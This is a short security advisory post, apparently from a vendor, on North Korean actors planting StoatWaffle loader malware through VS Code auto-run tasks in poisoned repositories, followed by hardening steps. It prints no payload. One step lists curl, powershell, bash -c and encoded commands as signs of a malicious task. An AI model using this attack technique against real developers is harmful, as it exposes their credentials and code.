North Korean Hackers Abuse VS Code Auto-Run Tasks to Deploy StoatWaffle Malware

North Korean Hackers Are Weaponizing Your Code Editor

Your IDE is now a threat vector. North Korean state-sponsored threat actors have been caught abusing VS Code's auto-run task feature to silently drop StoatWaffle malware onto developer machines - turning one of the most trusted tools in your stack into an entry point for a nation-state attack.

What Happened

VS Code supports .vscode/tasks.json files that define tasks automatically executed when a workspace loads. Attackers are embedding malicious auto-run task configurations inside poisoned repositories and project archives. When an unsuspecting developer opens the project, VS Code fires off the task - no prompt, no warning, no user interaction required.

The payload in question is StoatWaffle, a stealthy loader malware linked to North Korean threat clusters. Once deployed, it:

• Establishes persistence on the compromised machine
• Phones home to attacker-controlled infrastructure
• Drops secondary payloads for credential harvesting and lateral movement
• Targets developer environments specifically - meaning source code, tokens, and cloud credentials are all at risk

This campaign fits a well-documented North Korean playbook: infiltrate developer pipelines, compromise upstream tooling, and use trusted workflows as cover.

Why This Works So Well

Developers trust their tools. A tasks.json file looks completely routine inside a project directory. Most engineers never audit workspace configuration files before opening a repo - and VS Code's auto-run behavior makes that oversight immediately dangerous.

The attack scales easily through fake job offers, open source contributions, and trojanized code samples - all proven delivery mechanisms used by groups like Lazarus and its sub-clusters.

How to Lock This Down

Protect your local environment with these concrete steps:

• Audit every .vscode/tasks.json before opening unfamiliar repos - treat it like executable code, because it is
• Disable automatic task running via VS Code setting: set "task.allowAutomaticTasks": "off" in your user settings
• Use workspace trust - VS Code's built-in Restricted Mode will block auto-tasks in untrusted workspaces, enable it by default
• Scan cloned repos for suspicious task definitions, especially those invoking curl, powershell, bash -c, or encoded commands
• Rotate credentials immediately if you opened an untrusted workspace without these protections in place
• Treat .vscode/ as attack surface in your threat model - not just a convenience folder

Your editor config is code. Review it like code.

Is your app vulnerable to similar attacks? Run an automated scan in 3 minutes with VibeShield.